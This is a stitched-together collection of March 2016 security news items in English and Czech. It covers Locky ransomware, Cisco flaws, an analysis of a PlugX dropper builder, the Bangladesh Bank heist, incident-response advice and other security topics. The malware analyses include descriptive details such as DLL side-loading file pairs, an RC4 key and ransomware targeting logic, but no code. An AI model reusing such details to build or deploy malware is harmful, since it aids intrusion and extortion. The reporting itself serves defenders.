The threat actors simply changed tactic and malware, in the case os Dridex they used email attachment disguised as an invoice, typically documents embedding malicious macro, the recent Locky ransomware campaign relies on JavaScript attachment that downloads the Locky code.

The Locky ransomware uses AES encryption algorithm to encrypt both local files and files on network shares, even if they are unmapped.

When started, Locky creates and assigns a unique 16 hexadecimal number to the infected machine, then he will scan all drives and unmapped network shares for files to encrypt.

The malware uses the AES encryption algorithm and encrypts only file with extensions matching a certain criteria while it skips files containing certain strings in their full pathname and filename (i.e. tmp, winnt, Application Data, AppData, Program Files (x86), Program Files, temp, thumbs.db, $Recycle.Bin, System Volume Information, Boot, and Windows).

The Locky ransomware encrypts files renaming the to [unique_id][identifier].locky, the researchers also discovered that the unique ID and other information are embedded at the end of the encrypted file.

The malware will also delete all of the copies of documents in the Shadow Volume, making impossible to restore files.

“Inside the Locky ransom notes are links to a Tor site called the Locky Decrypter Page. This page is located at 6dtxgqam4crv6rr6.onion and contains the amount of bitcoins to send as a payment, how to purchase thebitcoins, and the bitcoin address you should send payment to. Once a victim sends payment to the assigned bitcoin address, this page will provide a decrypter that can be used to decrypt their files.” BleepingComputer reports in a blog post.


CISCO warns customers of high-severity flaws in modems and gateways
13.3.2016 Vulnerebility

Cisco released a series of software updates to patch several high severity flaws in its cable modems, residential gateways and security appliances.
Cisco just patched critical vulnerabilities in its cable modems, residential gateways and security appliances.

The security updates released this week fix serious flaws in Cisco residential reported by Kyle Lovett, and Chris Watts from Tech Analysis firm.

Kyle Lovett has found an information disclosure vulnerability (CVE-2016-1325) that allows a remote unauthenticated attacker to access sensitive data on vulnerable CISCO devices (Cisco DPC3941 Wireless Residential Gateway with Digital Voice and the DPC3939B Wireless Residential Voice Gateway).

“A vulnerability in the web-based administration interface of the Cisco Wireless Residential Gateway could allow an unauthenticated, remote attacker to access sensitive information on the affected device. ” states the CISCO advisory. “The vulnerability is caused by improper access restrictions implemented on the affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device.”

Chris Watts discovered another a denial-of-service (DoS) flaw (CVE-2016-1326) affecting the Cisco DPQ3925 8×4 DOCSIS 3.0 Wireless Residential Gateway that could be exploited by a remote unauthenticated attacker to cause the device to become unresponsive.

“A vulnerability in the web-based administration interface of Cisco Model DPQ3925 8×4 DOCSIS 3.0 Wireless Residential Gateway with EDVA could allow an unauthenticated, remote attacker to cause the device to become unresponsive and restart, creating a denial of service (DoS) condition.” states the Cadvisory.

Watts also discovered a second remote code execution vulnerability (CVE-2016-1327) in Cable Modem with Digital Voice models DPC2203 and EPC2203 that can be exploited by a remote attacker to trigger a buffer overflow and run execute arbitrary code by sending a specially crafted HTTP request to vulnerable devices.

“A vulnerability in the web server used in the Cisco Cable Modem with Digital Voice Model DPC2203 could allow an unauthenticated, remote attacker to exploit a buffer overflow and cause arbitrary code execution.” states the CAdvisory.

“The vulnerability is due to improper input validation for HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device.”

CISCO warned its customers also about a DoS vulnerability (CVE-2016-1312) affecting the HTTPS inspection engine of the Cisco ASA Content Security and Control Security Services Module (CSC-SSM). The flaw affects the way the devices handle HTTPS packets, allows a remote unauthenticated attacker to reload affected devices by flooding it with HTTPS packets.

“A vulnerability in the HTTPS inspection engine of the Cisco ASA Content Security and Control Security Services Module (CSC-SSM) could allow an unauthenticated, remote attacker to cause exhaustion of available memory, system instability, and a reload of the affected system. ” reports the advisory.

“The vulnerability is due to improper handling of HTTPS packets transiting through the affected system. An attacker could exploit this vulnerability by sending HTTPS packets through the affected system at high rate. “

If you or your organization uses one of the vulnerable devices affected by the vulnerabilities apply the security updates.


PlugX malware: A good hacker is an apologetic hacker
13.3.2016 Virus
It happens that malware writers and other miscreants in the digital world put messages in their malware. Sometimes they do it just for the “lulz”, sometimes to insult a person who hampers their criminal business, sometimes to deliver information to the guys on the other side who oppose them. We hope the case described in this blogpost falls into the first category, i.e. funny message. At least it seemed funny for us.

Our first research into PlugX was published in 2012 – since then this remote access tool (RAT) has become a well-known instrument used in a series of attacks all over the globe targeting multiple industry verticals. PlugX has been detected in targeted attacks not only against military, government or political organizations but also against more or less ordinary companies. In 2013, we discovered that the Winnti group responsible for attacking companies in the online gaming industry has been using the PlugX remote administration tool since at least May 2012.

This time, looking through some anomalous PlugX samples, we stumbled upon one specimen that had an RC4 encoded resource inside. Actually, it turned out to be a test sample with dummy settings. Luckily, it was quite easy to find the initial builder that generates such samples.

 

Basically, the builder compiles a handful of different PlugX droppers, including the notorious SFX RAR archives containing the PlugX trinity – a legitimate signed executable susceptible to a DLL side-loading attack, a DLL that is picked up by an executable and the payload file that maintains all the juicy stuff – the PlugX functional library, C2s and other settings.

One such trinity includes Lenovo’s RGB LCD Display Utility for ThinkPad: tplcdclr.exe, wtsapi32.dll (loaded by the application) and the “payload” file wts.chm (loaded by the DLL).

 

PlugX malware: A good hacker is an apologetic hackerLegitimate executable from the first PlugX trinity

Another set of three includes a signed version of Steve Gibson’s Domain Name System Benchmarking Utility sep_NE.exe, the winmm.dll file, which the application is dependent on, and the “payload” file sep_NE.slf.

 

PlugX malware: A good hacker is an apologetic hackerLegitimate executable from the second PlugX trinity

 

But among all the droppers that the builder generates there are two templates posing as executables, with the data maintained usually in a separate “payload” file, embedded in the initial body of the file as a resource.

 

The “payload” stuff is kept in encrypted form in the file body. After decryption, this stuff looks like one of the usual PlugX “payload” files, those with easily recognizable shellcode at the beginning:

 

The algorithm used to encrypt the payload resource is RC4. And finally (and this is what impelled us to write this blogpost) – the RC4 key for the resource decryption – “SORRY.i_have_to_do_this“.

 

Hmm, interesting… That’s not the message one might expect to find in APT malware that has swamped almost every vertical in nearly every corner of the world. There have been investigations into the infamous PlugX developer in the past. We also have found a number of malware families that are related in some way to PlugX and have likely been developed by the same person. All together it seems that this person has been quite busy in generating malware for different Chinese-speaking APT groups for a long time. That’s obviously a job, already work with no room for sentiment. That’s why the text looks inappropriate here. Unless the malware writer was in a playful mood and had put this in for trolling.

There’s a second option that occurs. Since this is a dropper feature, the dropper for the PlugX could have been developed by another person, not the PlugX developer. In an ordinary cybercriminal hierarchy there are, for example, developers of a bot, ransomware, etc. and packers who create wrappers/droppers to try and allow the core malware to evade AV detection.

Probably some other person, who is not yet such a veteran in the Chinese-speaking APT world and still sees the malware writing practice as some sort of game, was just kidding around.

If you use your imagination, we’re sure you’ll be able to come to your own interesting or quirky conclusions as to how that message ended up in these PlugX droppers. In any case, we really hope this was a bit of fun and not a cry for help from some desperate person forced by circumstances to do bad things.

We detect samples generated by the builder and the builder itself with following modifications of the Gulpix family:
Backdoor.Win32.Gulpix.ajp
Backdoor.Win32.Gulpix.ams
Backdoor.Win32.Gulpix.axe
Backdoor.Win32.Gulpix.axf
Backdoor.Win32.Gulpix.axg
Backdoor.Win32.Gulpix.axi
Backdoor.Win32.Gulpix.axj
Backdoor.Win32.Gulpix.axm
Backdoor.Win32.Gulpix.axn
Backdoor.Win32.Gulpix.axo

And two heuristic verdicts:
HEUR:Trojan.Win32.Generic
HEUR:Trojan.Win32.Invader

The builder MD5 hash is e57691e4f220845df27806563c7dca0b.

Legitimate executables included in PlugX trinities mentioned in the blog-post:
ce2ae795117e54ca8403f86e7a3e19a7 – DNS Benchmark Utility;
d9978f95ce30e85943efb52c9c7d731b – Lenovo’s ThinkPad Display Utility tplcdclr.exe.


Reuters – Malware suspected in the Bangladesh central bank heist
13.3.2016 Virus

Investigators suspect the attackers behind the Bangladesh central bank ‘s hack have used a malware to gather information for the Fed’s heist.
One of most intriguing stories this week is the hack of the Bangladesh account at the Federal Reserve Bank of New York.

The Bangladesh’s Finance Minister Abul Maal Abdul Muhith accused the U.S. Federal Reserve of the theft of at least $81 million stolen from the Bangladesh’s account.

The central bank of Bangladesh declared the funds had been stolen from an account by hackers, the experts had traced some of the missing funds in the Philippines.

In reality the hackers tried to steal much more, they tried to complete dozens of transfers for an overall amount of $850 million.

What happened?

While investigators are collecting evidence on the alleged hack, security experts made some speculation on the incident. It is likely hackers breached Bangladesh Bank in early February stealing credentials for payment transfers, then they used the credentials to order transfers out of a Federal Reserve Bank of New York account held by Bangladesh Bank.

Anyway it is a complex hack, the attackers had a deep knowledge about Bangladesh Bank’s procedures for ordering transfers, likely they spied on Bangladesh Bank staff to gather the information.

Federal reserve New York hack

According to the Reuters, investigators believe hackers alleged used a malware to infect systems at the Bangladesh central bank. Two bank officials told to the Reuters that the attackers infiltrated the computer systems for weeks gathering information on the internal operation to use in the attack later.

“Investigators suspect that malicious software code, often referred to as malware, which allowed hackers to learn how to withdraw the money could have been installed several weeks before the incident, which took place between Feb. 4 and Feb. 5, said Bangladesh Bank officials briefed on the matter.” reported the Reuters.

The authorities hired the FireEye Inc’s Mandiant forensics division to investigate the cyber heist.

It is likely attackers have stolen the Bangladesh Bank’s credentials for the SWIFT messaging system, a network used by financial institutions and private corporates to authorize transfer financial transactions through a ‘financial message’.

“SWIFT and the Central Bank of Bangladesh are working together to resolve an internal operational issue at the central bank. SWIFT’s core messaging services were not impacted by the issue and continued to work as normal.” reads a statement issued on Friday by the SWIFT.

The incident could have serious repercussions on the way central banks worldwide operates, they need to review their processes and systems in order to prevent other attacks.


Pozor: Co při útoku hackerů nedělat!

13.3.2016 Hacking
Jak zjistit, že k útoku došlo? To dnes představuje nejtěžší otázku v oblasti informační bezpečnosti. Příběhy dlouhé roky neodhalených průniků a útoků se objevují prakticky neustále. Smutné pak je, že když se o průniku dozvíme, často jednáme nejhorším možným způsobem.

„Zamkněte dveře,“ nařídil letový ředitel NASA LeRoy Cain. „Nevypínejte počítače. Nikdo neopustí své místo. Nikdo nebude telefonovat. Zazálohujte všechna dostupná data, odložte své poznámky.“

Kalendář ukazoval 1. února 2003 a letový ředitel právě čelil nejhoršímu možnému scénáři, jaký si bylo možné představit: během přistávacího manévru se nad Texasem rozpadl raketoplán Columbia.

Ač Cainovi stékaly slzy z očí – na palubě stroje bylo sedm astronautů a šance přežít rozpad raketoplánu ve výšce 65 kilometrů při rychlosti 6,5 km za sekundu a obklopeném žhavou plazmou o teplotě několika tisíc stupňů Celsia byla nulová – zachoval si chladnou hlavu.

Postupoval přesně podle předem připravených plánů a zachránil všechna data uložená v počítačích, což později významně pomohlo zrekonstruovat průběh nehody.

Samozřejmě je velmi nepravděpodobné, že by někdo z nás jednou čelil podobné situaci. Na druhé straně si z ní každý z nás může odnést ponaučení při řešení bezpečnostních incidentů.

Obvykle nedostatky

Naším nejčastějším prohřeškem ve chvíli, kdy se „něco stane“, je to, že nemáme plán reakce (Incident Response, IR). Samozřejmě v takové chvíli už je pozdě na něj myslet, ale to je o důvod víc nachystat si jej dříve, než bude pozdě.

Když je jakýmkoliv způsobem bezpečnostní problém odhalený, často se ukáže, že není jasné, co se má dělat. Není stanovená osoba nebo tým, dokonce nebývá stanovený ani postup.

Většinou je pouze vyrozuměn pracovník IT oddělení, ale to se často děje jen jaksi automaticky. V případě absence „horké linky“ nemusí být navíc k zastižení.

Stejně tak nemusí vědět, co přesně má dělat (s informatikem, který vše řeší doporučením restartu, se asi setkal každý z nás). A navíc nemusí mít vůbec zájem incident nějak důkladně šetřit: vždyť incident může (ale samozřejmě také nemusí) ukázat na jeho osobní selhání.

Ostatně to není problém pouze IT pracovníků, i na úrovni organizací je často snaha incidenty „zametat pod koberec“ a zásadně nepřiznávat chybu.

Proto je nezbytně nutné mít alespoň základní plán zvládání bezpečnostních incidentů. Ovšem pozor: plán musí být funkční. Zatímco zhruba šedesát procent organizací jej má, praxe ale ukazuje, že zhruba dvě třetiny plánů v praxi nefungují.

Často se vytvoří, aby se učinilo zadost zadání nebo aby se zaplnila mezera identifikovaná během některého z nesčetných auditů. Byť to zní vznosně, plán zvládání bezpečnostních incidentů je čas od času potřeba prověřit ostrým cvičením. To odhalí drobnosti, které jinak zůstávají přehlédnuté.

Třeba jako v případě jisté newyorské nemocnice, která si bezpečnostní audit nechala zpracovat – konstatovalo se v něm, že záložní dieselové agregáty v suterénu nejsou šťastným nápadem a že v případě velké vody nebudou plnit svoji úlohu.

Nemocnice je proto přesunula do vyšších pater. Auditor byl spokojený, problém se zdál být odstraněný. Pak ale přišel říjen 2012 a udeřil hurikán Sandy. Až v tu chvíli nemocnice s hrůzou zjistila, že agregáty sice přesunula – ale nádrže s naftou zůstaly v zaplaveném suterénu...

Jeden problém navazuje na druhý

Často na bezpečnostní incident reagujeme odstraněním nalezeného malwaru (což je nejčastější forma incidentu), a útok tím máme za ukončený. Jenže...

Tím se připravujeme o stěžejní důkazy, které nám mohou hodně napovědět o tom, kudy se útočník dostal do systému, kdy se tak stalo, jaké byly jeho záměry a co všechno vlastně získal. Druhou chybou, kterou v takové chvíli děláme, je vypnutí počítačů. Tím přicházíme o logy, nenahraditelná data v paměti apod.

Předpokládejme vždy nejhorší možný scénář: útok profesionála. Ten pak těžko použije jeden vektor, v horším případě mu dokonce sednete na vějičku: nastrčí kód, u něhož chce, aby byl nalezený. Skutečné nebezpečí se pak skrývá jinde. Dobrý útočník zkrátka bývá dobře připravený.

Samozřejmě že nikdo nechce, abyste se s rukama v klíně dívali, jak vám útočník stahuje další a další data ze sítě. Ale odstřihnout ho můžeme i jinak než vytržením elektrické šňůry ze zásuvky.

Například aktivací přísných omezení na firewallu nebo převodem veškerého provozu do uzavřené VPN sítě. Útočník sice bude výpadkem datového toku varován, ale vy nepřijdete o cenné informace.

A především: získáte čas a budete se moci rozhlédnout po informačním systému, aby bylo možné zmapovat celou šíři útoku.

Známý je například případ jedné americké banky, kdy útočník umístil do systému škodlivý kód. Po jeho odhalení následoval hloubkový bezpečnostní audit, který zjistil, že útočník ve skutečnosti zanechal v systému přes 300 druhů různého malwaru. Jinými slovy: odhalení jednoho exempláře zabránilo mnohem většímu útoku.

Zatajit, nebo nezatajit?

Kolik IR plánů tedy instrukce týkající se krizové komunikace obsahují? Tedy to, koho, kdy a jak informovat – nebo kdo má právo hovořit. Pokud nás k tomu legislativa nenutí jinak, máme tendenci bezpečnostní incidenty utajovat. Jistá logika v tom je: následná panika může natropit více škody než vlastní incident.

Na druhé straně si pak informace mohou žít svým vlastním životem. „Informovat, či neinformovat“ tak představuje jedno ze zásadních dilemat informační bezpečnosti – ale i to se však dá do značné míry ošetřit v plánech reakce.


Experti bijí na poplach. Vyděračských virů v Česku dramaticky přibylo

13.3.2016 Viry
V posledních týdnech dramaticky narostl počet škodlivých e-mailů, prostřednictvím kterých šíří počítačoví piráti viry. Nejčastěji jde o vyděračské viry z rodiny tzv. ransomwarů. Podle bezpečnostních expertů ze společnosti Eset je Česká republika jednou z nejvíce zasažených zemí, kde se tito nezvaní

Jak se bránit vyděračským virům!

:: Neotvírejte přílohy e-mailových zpráv od neznámých a podezřelých adresátů.
:: Pravidelně zálohujte svoje data. V případě nákazy se počítač jednoduše přeinstaluje a zašifrovaná data se mohou obnovit i bez placení výkupného nebo nutnosti je odšifrovat.
:: Externí disky nebo jiné úložné systémy, na které jsou data zálohována, by neměly být neustále připojeny k počítači. Minimalizuje se tím riziko, že se vyděračský virus zabydlí i u zálohovaných dat.
:: Pravidelně aktualizujte operační systém i jiné programy. Znesnadníte tak práci počítačových pirátů, kteří se snaží objevené trhliny zneužít k propašování škodlivých kódů.
:: Nutné je také pravidelně aktualizovat antivirový program, případně jiné bezpečnostní aplikace.
:: Nepoužívejte programy, pro které již výrobce ukončil podporu. Hrozba nákazy například na Windows XP je mnohonásobně vyšší než u novějších verzí tohoto operačního systému.
„Virová nákaza se šíří prostřednictvím e-mailových zpráv, které obsahují přílohu ve formátu zip. Ta je nejčastěji označena jako faktura nebo pozvání k soudu. Tímto trikem se útočníci snaží oběť navést k tomu, aby otevřela obsah přílohy,“ prohlásil Petr Šnajdr, bezpečnostní expert společnosti Eset.

Podle něj se po otevření souboru nainstaluje do počítače škodlivý kód. Jde například o virus zvaný Nemucod, který se uhnízdí v počítači a může potom stahovat další nezvané návštěvníky.

Tento škodlivý kód začne šifrovat obsah počítače a uživateli oznámí, že za dešifrování musí zaplatit.
Petr Šnajdr, bezpečnostní expert společnosti Eset
Nejčastěji stahuje právě vyděračské viry. „Aktuálně stahuje především různé typy ransomware, například známý TeslaCrypt nebo Locky. Následně tento škodlivý kód začne šifrovat obsah počítače a uživateli zobrazí oznámení, že za dešifrování počítače musí zaplatit,“ dodává Šnajdr.

Ani po zaplacení výkupného navíc nemají uživatelé jistotu, že se ke svým datům skutečně dostanou. Virus je nutné z počítače odinstalovat a data následně pomocí speciálního programu odšifrovat. V některých případech to ale není možné.

Používají stejné šifrování jako finanční instituce
Právě zmiňované dva programy totiž používají poměrně sofistikované šifrování. Jde o obdobu toho, co používají finanční instituce při zabezpečení plateb po internetu.

Právě před jedním ze zmiňovaných vyděračských virů varovala také bezpečnostní společnost Check Point. „Za pouhé dva týdny se Locky pokusil ohrozit uživatele ve více než 100 zemích,“ varoval mediální zástupce Check Pointu Petr Cícha.

„Kyberzločinci infikují systém e-mailem s wordovou přílohou, která obsahuje škodlivé makro. Jakmile uživatel soubor otevře, tak makro spustí skript, který stáhne spustitelný škodlivý soubor, nainstaluje se na počítač oběti a vyhledává soubory, které šifruje. Uživatel potom ani neví, že útok začal právě kliknutím na e-mailovou přílohu,“ doplnil Cícha.

Ostražití by před vyděračskými viry neměli být pouze majitelé klasických počítačů. Loni v červnu bezpečnostní experti odhalili nezvaného návštěvníka, který požadoval výkupné i na mobilním telefonu.


Hackerům se nepovedlo ukrást miliardu dolarů díky překlepu

13.3.2016 Incidenty
Hackerům se nepovedlo ukrást miliardu dolarů díky překlepuVčera, Milan Šurkala, aktualitaCesta k velkému bohatství může být občas ukončena velmi nepříjemným malým detailem. Hackeři dokázali nezákonně získat téměř miliardu dolarů, nicméně při stahování peněz na další účty udělali překlep, což jim naštěstí vše zkazilo.
Během 4. a 5. února 2016 se skupině hackerů patrně podařilo prolomit zabezpečení Bangladesh Bank a dostat se k téměř miliardě dolarů (hovoří se o zhruba 850-870 milionech). Tyto peníze pak převáděli přes různé banky na účty ve Filipínách a Srí Lance. Jen na Federal Reserve Bank přišly desítky žádostí na převody peněz. Povedly se jim čtyři přenosy, každý za zhruba 20 milionů dolarů. Uschovali si tedy lehce přes 80 milionů dolarů, nicméně pátý přenos jim už nevyšel.

Ten směřoval do Shalika Foundation ve Srí Lance, nicméně hackerům se povedlo splést název organizace a místo "Foundation" napsali "Fandation". Toho si všimla Deutsche Bank, přes kterou měly tyto peníze jít a zažádala o vysvětlení této podezřelé transakce, čímž se na celou záležitost přišlo. Bangladesh Bank se už povedlo některé z peněz získat zpátky a nyní chce žalovat Federal Reserve Bank za to, že dostatečně rychle nerozpoznala podezřelé transakce. Bangladesh Bank na situaci nedokázala rychle reagovat, neboť šlo o nepracovní dny.


Barack Obama chce opět backdoor v softwaru ze zákona

13.3.2016 Hrozby
Barack Obama chce opět backdoor v softwaru ze zákonaDnes, Milan Šurkala, aktualitaPoslední týdny se přetřásá kauza FBI a Applu, střídají se názory, zda má Apple odemknout mobil teroristů nebo nikoli. Americký prezident Barack Obama se v jednom rozhovoru zmínil, že zadní vrátka v softwaru by měla být povinná.
V jednom z rozhovorů s americkým prezidentem Barackem Obamou byl dotázán na názor ohledně kauzy FBI a Applu (zda má Apple odemknout mobil teroristy a zpřístupnit tak data pro FBI), ten se ale k tomuto případu nechtěl vyjadřovat. Přesto jeho reakce vcelku mířila právě na tento případ. Hovořil o tom, že nechce, aby vláda mohla prohlížet mobilní telefony, jak se jí zlíbí, ale zároveň podotknul, že neprolomitelné šifrování v uživatelském sektoru je obrovský problém.

Důvodem je např. to, jak by při neprolomitelném šifrování mohly bezpečnostní složky odhalit např. dětskou pornografii, teroristické plány nebo třeba daňové úniky. Už zde je jasné, že chce monitorování ve velkém rozsahu. Dle Obamy by software měl mít zadní vrátka (backdoor), která by umožňovala vybraným lidem dostat se do každého zařízení a chce dosáhnout nějakého kompromisu. Cílem je, aby tento klíč mělo co nejméně lidí, nicméně i tak je rozhodně docela zvláštní využívat nejpokročilejší šifrovací systémy, když víte, že venku je pár lidí, kteří znají klíč "ze zákona". Šifra s klíčem v rukou vlády ale těžko bude "kompromisní". Připomeňme, že soud Apple versus FBI bude už 22. března a už v minulém roce vydal Obama vyhlášku, která nařizuje sdílení dat s vládou.


Adobe updatuje Flash, kritická chyba dovolovala ovládnutí počítače

13.3.2016 Zranitelnosti
Adobe updatuje Flash, kritická chyba dovolovala ovládnutí počítačeDnes, Milan Šurkala, aktualitaKdysi velmi populární Flash se pomalu opouští a není divu. Vedle nepříliš dobrého výkonu má také spoustu bezpečnostních chyb. Poslední update opravuje např. chybu CVE-2016-1010, která dovolila útočníkům převzít kontrolu nad počítačem.
Adobe Flash je čím dál v menší oblibě. Prvně je nahrazován HTML5, za druhé přináší spoustu bezpečnostních děr a poslední aktualizace (např. 21.0.0.182 pro Windows a Mac OS) opravuje celkem 23 bezpečnostních chyb, z nichž mnohé byly označeny jako kritické. Např. chyba CVE-2016-1010 dovolila převzít kontrolu nad počítačem a to se týkalo i mnoha dalších. Navíc jsou známy případy, kdy tato chyba byla využita ke skutečným útokům.

Společnost Adobe tedy doporučuje urychlený update na nejnovější verze tohoto přehrávače napříč všemi platformami. Týká se to tedy Windows, Mac OS, Linuxu i verzí pro mobilní telefony a jejich operační systémy.


Biometrie na vzestupu: Co všechno vám už dnes může přinést?

13.3.2016 Zabezpečení
Biometrické zabezpečení zažívá strmý růst. Je to z velké části i kvůli tomu, že mnoha mobilním uživatelům vyhovuje pohodlnost používání nástrojů, jako je identifikace otiskem prstu. Bude však hrát biometrie významnou roli také v řešeních podnikového zabezpečení?

Bezpečnostní experti upozorňují, že biometrické technologie mají pozitiva i negativa. Na straně pozitiv je biometrie efektivním způsobem prokazování skutečné identity jednotlivých uživatelů.

„Nejviditelnější výhodou je, že se dokazuje identita osoby s větší mírou jistoty,“ tvrdí Jason Taule, ředitel zabezpečení ve firmě FEI Systems, která je poskytovatelem technologických produktů pro zdravotnictví.

„Předpokladem ovšem je, že se biometrie použije v kombinaci s něčím, co tento člověk zná. To je velmi důležité v situacích, kdy dochází k přístupu k systémům a prostředkům vyšší úrovně citlivosti,“ dodává Taule.

S využitím biometrie „víte, že jednotlivec přistupující k zabezpečeným oblastem či informacím je nejen osobou disponující odpovídajícími přihlašovacími údaji, ale je to skutečně osoba, které se přístup udělil“, říká Maxine Most, ředitel společnosti Acuity Market Intelligence. „To zlepšuje zabezpečení a poskytuje to kontrolní záznam.“

Biometrie může také poskytnout větší komfort. „Přestože existují jasné rozdíly mezi různými variantami biometrie (například otisky prstů versus skenování duhovky), výhodou využití této technologie pro autentizaci je skutečnost, že osoba nemůže tento identifikátor zapomenout, jako se to může například stát u hesla, ani ho nemůže někde nechat nebo jí ho někdo nemůže ukrást, jako se to může stát u tokenu,“ popisuje Taule.

To podle něj přináší snížení nároků na linku technické podpory a potenciálně úspory v oblasti nákladů na zaměstnance.

Na rozdíl od metod založených na heslech poskytuje biometrie „silnou autentizaci“, kterou nelze později popírat při soudním sporu, tvrdí Taule. V závislosti na způsobu implementace systému existuje možnost využít biometrii pro ověření totožnosti při vstupu do budovy nebo k autoritě, která poté umožní přístup k dalším zdrojům.

Biometrie může při správném využití „vyřešit mnoho problémů s pouhým využitím uživatelské identifikace a hesel“, tvrdí Mary Chaneyová, hlavní vedoucí týmu správy dat a reakce na incidenty ve finanční instituci GE Capital.

„Pokud použijete dynamické behaviorální biometrické rozpoznávání, jako je například dynamika úhozu do kláves, můžete získat výhodu dvoufaktorové autentizace,“ popisuje Chaneyová.

Použití dynamiky stisků kláves umožňuje organizacím měřit u každé osoby dobu stisku kláves a dobu mezi stiskem dalších kláves, říká Chaneyová a dodává: „Při tomto scénáři poskytuje pouhé zadání hesla dvoufaktorovou autentizaci.“

Kromě toho je podle ní dynamika stisků kláves velmi přesná a není pro uživatele rušivá, což jsou dva z největších problémů při používání biometrie při jakékoli implementaci zabezpečení.

Nesnadné zneužití

Dalším velkým přínosem použití biometriky je, že se velmi těžce falšuje, tvrdí Chaneyová. Při měření obou (fyziologických a dynamických) údajů se zaznamenávají informace pro každou osobu jedinečné a v průběhu času se málokdy mění.

Při správné implementaci není třeba v některých případech nic dalšího dělat, ani si pamatovat. Ztracená ID a zapomenutá hesla budou minulostí, říká Chaneyová.

Protože je osobní údaje nesmírně obtížné padělat, „mohly by se biometrické identifikátory používat k usnadnění jak fyzického přístupu, například v určitých oblastech podnikového areálu, tak i k virtuálnímu přístupu k vybraným místům v podnikovém intranetu“, uvádí Windsor Holden, šéf výzkumu v analytické firmě Juniper Research.

„Tato přihlášení lze přímo propojit s konkrétní aktivitou, takže v případě narušení bezpečnosti v rámci organizace lze rychle identifikovat odpovědnou osobu,“ říká Holden.

Biometrii lze také použít k integraci BYOD (využívání osobních zařízení pro firemní účely) do podnikových bezpečnostních strategií, „protože tak dochází k propojení osob a přístupu pomocí jejich osobních mobilních zařízení“, vysvětluje Most.

Prozatímní negativa

Na straně negativ stále figurují dvě velké nevýhody biometrie – vysoká cena a obavy o zachování soukromí, uvádějí experti...


Typos stopped hackers stealing $1bn from Federal Reserve Bangladesh account
13.3.2016 Hacking

Hackers who allegedly infiltrated the Federal Reserve Bangladesh’s account were attempting to steal almost $1 billion, but typos thwarted the plan.
This week the principal news agencies shared the news of the hack of the Bangladesh account at the Federal Reserve Bank of New York.

The Bangladesh’s Finance Minister Abul Maal Abdul Muhith accused the U.S. Federal Reserve of the theft of at least $81 million stolen from the Bangladesh’s account. The Government of the Bangladesh is threatening the US for a legal fight to retrieve the funds, explained Muhith in a press conference held in Dhaka on Tuesday.

The central bank of Bangladesh declared the funds had been stolen from an account by hackers, the experts had traced some of the missing funds in the Philippines.

In reality the hackers tried to steal much more, they tried to complete dozens of transfers for an overall amount of $850 million.

The disaster was avoided by accident because the bank’s security systems and typos in some requests allowed the identification of the theft attempts, investigators discovered that hackers failed 35 transfer attempts.

“$81 million was transferred from the Federal Reserve Bank to Filipino accounts while attempts to claim $850 million were foiled by the Federal Reserve Bank’s security system,” Razee Hassan, deputy governor of Bangladesh Bank, told AFP.

“Attempts to transfer money to Sri Lanka by the hackers were foiled as their transfer requests contained typos,” he added.

The hackers exploited gaps in communication between banks at weekends, the operation started on a Friday because the Bangladesh Bank is closed, on the following days, Saturday and Sunday, the Fed Bank in New York was being closed.

Federal reserve New York hack

The choice of the Philippines as the landing country for the bank transfers was not casual, banks were also closed on the Monday due to the Chinese New Year.

While the central bank of Bangladesh is blaming Chinese hackers, the Fed is denying the security breach of security took place.

On Monday, a spokeswoman for the US Federal Reserve Bank of New York confirmed there was no evidence of a security breach, neither that the Bangladesh Bank account had been hacked.

Currently, the US Fed and the Bangladesh Government are still investigating the incident.

The Federal Reserve Bank of New York wrote still continues to deny any evidence of attempts to hack into the Federal Reserve systems:


The Pentagon used military drones for domestic surveillance
13.3.2016 IT

A report published by the DoD Inspector General revealed that military drones have been used for Non-Military domestic Surveillance.
The US Government has admitted the use of drones for operations of domestic surveillance. The US Military clarified that all the operations were authorized by a regular warrant confirming that no legal violations were found.

The news was revealed by the USA Today that obtained it with a Freedom of Information Act request. A report issued by the Inspector General at US DoD states the that less than 20 missions have been flown by military spy drones on non-military missions between 2006 and 2015.

The inspector general analysis was completed March 20, 2015, but the authorities released it recently.

“The Pentagon has deployed drones to spy over U.S. territory for non-military missions over the past decade, but the flights have been rare and lawful, according to a new report” states the USA Today.

The DoD report revealed the Pentagon established interim guidance in 2006 governing when and whether the drones could be used for domestic surveillance missions.

“The interim policy allowed spy drones to be used for homeland defense purposes in the U.S. and to assist civil authorities.” continues the post.

The policy highlights that any use of military drones for civil authorities had to be approved by the Secretary of Defense or someone delegated by the secretary.

The US government won’t disclose the details of non-military spying missions flown by the drones, anyway it has publicly issued a list of nine operations conducted between 2011 and 2016:

“The Pentagon has deployed drones to spy over U.S. territory for non-military missions over the past decade, but the flights have been rare and lawful, according to a new report” states the USA Today.
The DoD report revealed the Pentagon established interim guidance in 2006 governing when and whether the drones could be used for domestic surveillance missions.

“The interim policy allowed spy drones to be used for homeland defense purposes in the U.S. and to assist civil authorities.” continues the post.

The policy highlights that any use of military drones for civil authorities had to be approved by the Secretary of Defense or someone delegated by the secretary.

The US government won’t disclose the details of non-military spying missions flown by the drones, anyway it has publicly issued a list of nine operations conducted between 2011 and 2016:

DoD operations of domestic surveillance

The US Military seems to have refused to provide the entire archive related to civic requests for the military drone usage for domestic surveillance.

“The report quoted a military law review article that said “the appetite to use them (spy drones) in the domestic environment to collect airborne imagery continues to grow, as does Congressional and media interest in their deployment.”” continues the USA Today.

US drones domestic survellaince
Source: USA Today

Let’s close reminding that the domestic surveillance with drones is allowed with the explicit authorization by the defense secretary.

The USA today confirmed that shortly before the DoD Inspector General report was completed, the Pentagon issued a new policy governing the use of spy drones. The policy requires the defense secretary to approve every single domestic surveillance mission relying on drones.

The report states the drones “may not conduct surveillance on U.S. persons” and bans the use of armed drones over the United States.


DARPA Improv program, weaponizing the off-the-shelf electronics
13.3.2016 IT

The Defense Advanced Research Projects Agency is launching a new project dubbed Improv that aims to develop new techniques to hack into everyday technology.
The IoT paradigm is enlarging as never before our surface of attack, it is obvious that cyber criminals and nation-state hackers are looking at it with an increasing interest.
The US Military Defense Advanced Research Projects Agency (DARPA) is asking American geeks to develop new techniques to turn everyday IoT objects into cyber weapons.

The DARPA is launching a new project dubbed Improv that aims to develop new techniques to hack into everyday technology.

The DARPA’s intent it to involve researchers, industry vendors, and hobbyists in finding new attack vectors for embedded devices and consumer technology.

IoT technology is being wide adopted in various industries, including transportation, healthcare and home automation. DARPA is particularly interested in off-the-shelf technology that could be abused by malicious attackers to cause damage on a large scale.

